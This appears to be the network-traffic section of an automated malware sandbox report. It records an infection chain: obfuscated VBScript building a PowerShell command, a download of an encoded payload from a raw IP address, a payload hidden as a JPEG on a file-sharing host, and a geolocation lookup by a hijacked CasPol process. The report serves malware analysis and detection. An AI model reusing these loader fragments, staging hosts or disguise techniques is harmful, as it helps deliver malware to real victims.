Data Ascii: iterativo & "wsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMyBWDCJXRASYMEQGU4yOTEvBWDCJXRASYMEQGULzpwdHRoaWZkLCBBWDCJXRASYMEQ
Nov 20, 2024 17:18:14.218844891 CET | 1236 | IN | Data Raw: 00 6a 00 51 00 70 00 4c 00 6e 00 4a 00 6c 00 55 00 45 00 78 00 42 00 51 00 32 00 55 00 6f 00 4a 00 32 00 6c 00 6d 00 5a 00 43 00 63 00 73 00 57 00 31 00 4e 00 30 00 63 00 6d 00 6c 00 75 00 52 00 31 00 31 00 62 00 51 00 32 00 68 00 42 00 63 00 6c
Data Ascii: jQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp" D
Nov 20, 2024 17:18:14.218879938 CET | 1236 | IN | Data Raw: 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 24 00 4f 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73
Data Ascii: SYMEQGU$OBWDCJXRASYMEQGU" momposteiro = momposteiro & "WBWDCJXRASYMEQGUj" momposteiro = momposteiro & "
Nov 20, 2024 17:18:14.218911886 CET | 1236 | IN | Data Raw: 00 20 00 20 00 20 00 20 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 3d 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 26 00 20 00 22 00 67 00 42 00 57 00 44 00 43 00 4a 00 58
Data Ascii: momposteiro = momposteiro & "gBWDCJXRASYMEQGU]:" momposteiro = momposteiro & ":UTBWDCJXRASYMEQGU"
Nov 20, 2024 17:18:14.218946934 CET | 1236 | IN | Data Raw: 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 6f 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 3d 00 20 00 6d 00 6f 00 6d 00 70 00 6f
Data Ascii: XRASYMEQGUo" momposteiro = momposteiro & "mbBWDCJXRASYMEQGUas" momposteiro = momposteiro & "eBWDCJXRASY
Nov 20, 2024 17:18:14.341175079 CET | 1236 | IN | Data Raw: 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 3d 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 26 00 20 00 22 00 78 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 65
Data Ascii: steiro = momposteiro & "xBWDCJXRASYMEQGUe -wiBWDCJXRASYMEQGUn" momposteiro = momposteiro & "dBWDCJXRASYMEQGUowBW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49765 | 192.3.220.29 | 80 | 7724 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 17:18:44.187983036 CET | 75 | OUT | GET /45/HDRDDG.txt HTTP/1.1
Host: 192.3.220.29
Connection: Keep-Alive
Nov 20, 2024 17:18:45.308274031 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 16:18:44 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 20 Nov 2024 06:25:06 GMT
ETag: "a0800-6275235f113e8"
Accept-Ranges: bytes
Content-Length: 657408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
Nov 20, 2024 17:18:45.308440924 CET | 224 | IN | Data Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5
Nov 20, 2024 17:18:45.308454990 CET | 1236 | IN | Data Raw: 51 5a 4f 45 6d 44 62 35 51 57 4f 67 6c 44 58 35 77 55 4f 49 6c 44 4f 35 41 53 4f 59 6b 44 46 35 41 52 4f 4d 6b 44 43 34 67 50 4f 30 6a 44 35 34 77 4d 4f 45 6a 44 77 34 77 4c 4f 34 69 44 71 34 51 4b 4f 55 69 44 66 34 51 48 4f 77 68 44 59 34 67 45
Data Ascii: QZOEmDb5QWOglDX5wUOIlDO5ASOYkDF5AROMkDC4gPO0jD54wMOEjDw4wLO4iDq4QKOUiDf4QHOwhDY4gEOAhDP4gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZN
Nov 20, 2024 17:18:45.308470011 CET | 1236 | IN | Data Raw: 31 44 5a 39 77 56 50 55 31 44 54 39 51 55 50 38 30 44 4e 39 77 53 50 6b 30 44 48 39 51 52 50 4d 30 44 42 38 77 50 50 30 7a 44 37 38 51 4f 50 63 7a 44 31 38 77 4d 50 45 7a 44 76 38 51 4c 50 73 79 44 70 38 77 4a 50 55 79 44 6a 38 51 49 50 38 78 44
Data Ascii: 1DZ9wVPU1DT9QUP80DN9wSPk0DH9QRPM0DB8wPP0zD78QOPczD18wMPEzDv8QLPsyDp8wJPUyDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl
Nov 20, 2024 17:18:45.308486938 CET | 1236 | IN | Data Raw: 77 52 50 59 30 44 45 39 67 41 41 41 41 41 58 41 55 41 73 41 73 44 69 37 51 34 4f 41 75 44 66 37 67 33 4f 30 74 44 63 37 77 32 4f 6f 74 44 5a 37 41 32 4f 63 74 44 57 37 51 31 4f 51 74 44 54 37 67 30 4f 45 74 44 51 37 77 7a 4f 34 73 44 4e 37 41 7a
Data Ascii: wRPY0DE9gAAAAAXAUAsAsDi7Q4OAuDf7g3O0tDc7w2OotDZ7A2OctDW7Q1OQtDT7g0OEtDQ7wzO4sDN7AzOssDK7QyOgsDH7gxOUsDE7wwOIsDB7AgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO
Nov 20, 2024 17:18:45.308501959 CET | 1236 | IN | Data Raw: 76 44 78 37 77 37 4f 30 75 44 72 37 51 36 4f 63 75 44 6c 37 77 34 4f 45 75 44 66 37 51 33 4f 73 74 44 5a 37 77 31 4f 55 74 44 54 37 51 30 4f 38 73 44 4e 37 77 79 4f 6b 73 44 48 37 51 78 4f 4d 73 44 42 36 77 76 4f 30 72 44 37 36 51 75 4f 63 72 44
Data Ascii: vDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD9
                                                                                                          Nov 20, 2024 17:18:45.308516979 CET1236INData Raw: 49 34 4f 34 74 6a 62 37 55 32 4f 2b 73 6a 4e 37 38 68 4f 37 72 7a 76 36 45 6f 4f 45 70 44 43 35 6b 66 4f 71 6e 7a 74 35 38 4b 4f 72 6a 7a 34 34 73 4e 4f 54 69 6a 62 34 77 45 4f 6e 67 44 47 34 6b 77 4e 30 55 6a 35 31 34 54 4e 69 51 6a 62 30 45 46
                                                                                                          Data Ascii: I4O4tjb7U2O+sjN78hO7rzv6EoOEpDC5kfOqnzt58KOrjz44sNOTijb4wEOngDG4kwN0Uj514TNiQjb0EFM1CzrwsJM9BzawYGAAAA8AUAYA8DE+wtPr6TR9oVPL1zP98SPS0jC8AOPZyTe80GPhxTT8E0Ofvz17k7OxuTq7E6OZujS74SOhmzl50WOghj/40OOnjj44wNO+iTt4wKOXizE3o/NyeDo3M5NIeDZ3QzNncTD2IqN
                                                                                                          Nov 20, 2024 17:18:45.308532000 CET1236INData Raw: 47 44 6d 78 73 47 4d 31 41 41 41 41 77 48 41 45 41 4e 41 2f 49 2f 50 52 2f 54 79 2f 45 37 50 64 36 44 30 2b 45 71 50 78 30 6a 35 39 34 64 50 69 31 7a 57 39 73 42 50 38 79 7a 6a 38 77 45 50 42 78 44 4f 38 51 78 4f 75 76 6a 35 37 63 34 4f 2f 74 7a
                                                                                                          Data Ascii: GDmxsGM1AAAAwHAEANA/I/PR/Ty/E7Pd6D0+EqPx0j594dPi1zW9sBP8yzj8wEPBxDO8QxOuvj57c4O/tzT74jORqDJ6QQOVnTz5UbOpmjY54UOUgDs4UGOchzU40DOxgzE4sAOAcz93E+NLfDk3U4N8dzS3MkN2aTp2UpNNaDf2wWNrVjF1YANpTTdzA8MZJT0yQoM5JTZygkMREzzx4JMiCzkwcIM3BjWwIFMoAAAAgKAEAMA
                                                                                                          Nov 20, 2024 17:18:45.308590889 CET1236INData Raw: 49 43 4e 58 4d 7a 2b 7a 45 2f 4d 57 50 54 30 7a 77 38 4d 42 50 6a 6a 7a 6f 32 4d 6c 4e 44 59 7a 55 31 4d 34 4d 44 46 79 41 75 4d 2f 4b 7a 70 79 49 71 4d 64 4b 6a 6b 79 41 6f 4d 65 4a 44 55 79 51 6b 4d 31 49 44 48 78 55 66 4d 74 48 6a 31 78 59 63
                                                                                                          Data Ascii: ICNXMz+zE/MWPT0zw8MBPjjzo2MlNDYzU1M4MDFyAuM/KzpyIqMdKjkyAoMeJDUyQkM1IDHxUfMtHj1xYcMKGjgxUWMgFzWxYQMBAz7wgOMiDz2wELMXCzgwsHMvBjUwgEMlAzGwYAAAEAmAQAcA8T9/M9PJ/Dv/M7PZ+Di/M1PK9TO/0yPS8TA+wsPF7Dm+EZPY3DX9gEPMxTA7E9OguDU7MzOtoz760tOXjz23M7MxPTjxIGM
                                                                                                          Nov 20, 2024 17:18:45.308609009 CET1236INData Raw: 76 7a 4a 37 73 67 4f 79 71 44 6d 30 6b 31 4d 32 50 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 58 77 45 4b 41 41 41 41 50 41 4d 41 30 41 34 44 52 78 77 58 4d 34 46 44 64 78 41 58 4d 73 46 44
                                                                                                          Data Ascii: vzJ7sgOyqDm0k1M2PDpzA6McODmzQ5MQODjzg4MEODgzw3M4NDXwEKAAAAPAMA0A4DRxwXM4FDdxAXMsFDaxQWMgBD1wwFMYBDVwAFMMBDSwQEMABAAAwCADAMA/Q7P88DO/QzPw8DL/gyPk8DI+cpPg4DH+ghPU4DE+wgPI4DB98GP4zD98APPszD68QOPgzD38MlO/qTr6soO2pjV6QUOngjaxgLM8AAAAQFADALA+AsPW0Tx
                                                                                                          Nov 20, 2024 17:18:45.430066109 CET1236INData Raw: 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72 50 75 36 44 71 2b 49 71 50 63 36 7a 6c 2b 45 70 50 4b 36 54 68 2b 41 6f 50 36 35 44 64 2b 34 6d 50 70 35 7a 59 2b 30 6c
                                                                                                          Data Ascii: owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu6Dq+IqPc6zl+EpPK6Th+AoP65Dd+4mPp5zY+0lPX5jU+wkPG5DQ+sjP14zL+kiPk4jH+ghPS4TD+cgPB0z+9YfPw3j69QePf3T29MdPN3Dy9IcP82jt9EbPr2Tp98ZPa2Dl94YPI2zg90XP31Tc9wWPm1DY9oVPV1zT9kUPD1jP9gTPx0jK9QSPc0jD8kuOypza68lO


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          2 | 192.168.2.7 | 49779 | 178.237.33.50 | 80 | 8052 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          Nov 20, 2024 17:18:50.131928921 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                                          Host: geoplugin.net
                                                                                                          Cache-Control: no-cache
                                                                                                          Nov 20, 2024 17:18:51.453716040 CET | 1170 | IN | HTTP/1.1 200 OK
                                                                                                          date: Wed, 20 Nov 2024 16:18:51 GMT
                                                                                                          server: Apache
                                                                                                          content-length: 962
                                                                                                          content-type: application/json; charset=utf-8
                                                                                                          cache-control: public, max-age=300
                                                                                                          access-control-allow-origin: *
                                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                          Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          0 | 192.168.2.7 | 49713 | 142.215.209.78 | 443 | 7724 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-11-20 16:18:22 UTC | 192 | OUT | GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                          Host: 1017.filemail.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-11-20 16:18:23 UTC | 324 | IN | HTTP/1.1 200 OK
                                                                                                          Content-Length: 2230233
                                                                                                          Content-Type: image/jpeg
                                                                                                          Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                          X-Transfer-ID: wxhdiueivoluihj
                                                                                                          Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                          Date: Wed, 20 Nov 2024 16:18:22 GMT
                                                                                                          Connection: close
                                                                                                          2024-11-20 16:18:23 UTC3719INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4 53 67 8e 05 f5 18 ab 6b dd 26 69 4e a0 96 54 09 1a aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f e9 75 7a ed 38 2f 16 a1 57 aa 32 df 26 cf 4a 3c fd 70 32 bc 0e 0d 6e 8b c4 c3 b0 29 1c 7f f7 a3 77 55 cf af e9 7c 5a 49 f4 4a 16 25 68 f6 8d b2 15 14 bc
                                                                                                          Data Ascii: a~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B}<h\WBHO*ux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU|ZIJ%h
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9 79 34 f0 86 8e 31 2b dd 6d 26 80 c0 30 00 59 20 57 b9 ca a9 de b6 18 b0 3d 3d b3 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5 5a a7 d3 24 a2 19 54 bc ad b8 10 7d 26 f3 36 46 68 51 95 26 32 2b 9a 65 45 71 c0 e9 76 a0 7f 3c f5 fa d8 47 fb 2b 5a 47 4f
                                                                                                          Data Ascii: H?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[y41+m&0Y W==Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73 e9 f2 c5 f0 3a 58 ca eb 7c 13 4e da 13 af f0 2d 44 ba 88 a2 03 ef 10 cd ff 00 7b 15 8f c5 b6 85 8f 88 f6 3e c7 03 c9 26 9b ca 05 49 e0 0b bf 7c e9 62 67 88 5a 31 65 1c 10 3b 7b 66 ab 03 e4 aa 3a 2f 99 7d 72 8f a5 6d cc 19 d3 72 ae e2 09 23 8e bf 5c 0c 54 0c d1 0d d6 1b bd f7 c9 88 38 9c 39 27 6a 8e 95 9a 6f a0 91 e6 55 52 80 32 ee 00 df 35 ce 28 90 32 44 fa 80 c9 4a 69 97 75 92 a7 8f a6 04 8d 42 ba b8 60 19 4b 28 04 76 eb 83 25 ba a1 dc 2f 82 07
                                                                                                          Data Ascii: /ER;UM'IlWLPOj=}O*d.NEWcs+f:c(]{g}?P*s:X|N-D{>&I|bgZ1e;{f:/}rmr#\T89'joUR25(2DJiuB`K(v%/
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69 59 43 99 cf 99 7d 42 8d a3 df 83 d7 07 e1 da 77 d4 e9 5f 53 2e 9d 67 59 11 4a 9d f7 b4 57 37 ec 40 24 fd 31 99 3c 5f 4f e0 9a 78 e0 d6 c8 5b 50 88 14 a2 7a 88 eb cb 0f e1 1d 39 c0 4a 7f 08 5d 1b 34 93 ce 86 28 dc 29 00 10 5b 8b ae 7d fe 18 b6 9b c3 9f 5e 9a 9d 4a 6d 8b 4e 84 aa 96 70 3e 9c 8e 78 cb 45 a5 d7 f8 ba ae a4 c2 eb 1a 90 11 59 7c bd ca 6c fa 41 e4 8f 8e 69 3f 86 cc 9e 01 26 95 c8 89 49 67 17 27 e1 02 8e da ae 7a 60 79 ef 1d d0 68 b4 40
                                                                                                          Data Ascii: aU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1iYC}Bw_S.gYJW7@$1<_Ox[Pz9J]4()[}^JmNp>xEY|lAi?&Ig'z`yh@
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48 fe b8 ef 89 78 82 6a 0e c8 d7 68 61 ef d7 03 2e 17 d6 24 ad 1e 92 56 10 5d ed eb 79 bb a4 90 e9 e0 65 d4 10 c4 7a ac 62 30 4f a7 d2 45 60 1d c4 75 cb 9d 6c 5a 85 01 68 0e 87 8e 4e 06 79 95 df ed 67 9d 1a f4 e0 9f f8 30 7e 2d 3b 3e aa 75 2d 41 a0 5b 00 5d d3 dd 65 d6 45 4f b5 22 98 14 ab 3f f2 11 fd 71 7f 16 dc 75 92 b0 1b 6e 1b 00 71 63 76 06 87 8c 05 fb 94 70 84 11 c4 b2 52 92 a7 9f 4b 61 b4 33 28 f0 b8 5a 45 5a 54 5a bf 82 8c 